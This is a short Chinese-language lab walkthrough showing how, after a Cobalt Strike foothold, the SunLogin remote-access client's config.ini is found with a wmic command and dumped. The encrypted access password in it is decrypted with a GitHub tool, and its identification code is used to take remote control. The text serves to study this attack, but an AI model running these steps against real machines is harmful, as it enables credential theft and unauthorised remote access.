一、本地搭建
准备好安装包,在安装的过程中可以看到默认的安装路径是C:\Program Files\Oray\SunLogin\SunloginClient
二、模拟攻击
首先上线CS
我这里本地就从自己得安装路径里找到config.ini的配置文件了,C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
如果安装路径做了修改可通过wmic process where processid=4580 get processid,executablepath,name命令进行查找
[base] installautorun= no_window_user_pwd=0 config_path=C:\Program Files\Oray\SunLogin\SunloginClient\config.ini tracksvr= encry_pwd=j3fMbkkO1Xo= macaddress=00:0C:29:66:95:D7 has_uu=0 showupdatetip=1 hostname=default hostdesc= level= levelname= levelchanel= istransfer= ismessage= expires= skin= sunlogincode= isfastcodelogin=1 logintype=0 license=4c9e-01cc-d914-1d36 licensepsw= fastcode=k405776325 fastcodepsw=CujhXo9mn9eb5e3a5hmxKxLTNqAsy3Oa sunloginserver=rc10-fc01.oray.com:443 slapiserver=slapi.oray.net account= language=0 first_run=0 width=1374 height=710 lastview=1 open_eyes=0 screenshots_path=C:\Users\ASUS\Documents\Sunlogin Files enable_print=0 display=1 interval=72 [common] serviceonly=0 autorun=1
在config.ini中存在这两个关键字段**
fastcode=*********
encry_pwd=********
1.fastcode为本机识别码
2.encry_pwd为本机验证码但被加密
这里可以通过 https://github.com/wafinfo/Sunflower_get_Password解密
结合实际情况
接下来远程连接即可,其中fastcode的值去掉字母就是本机识别码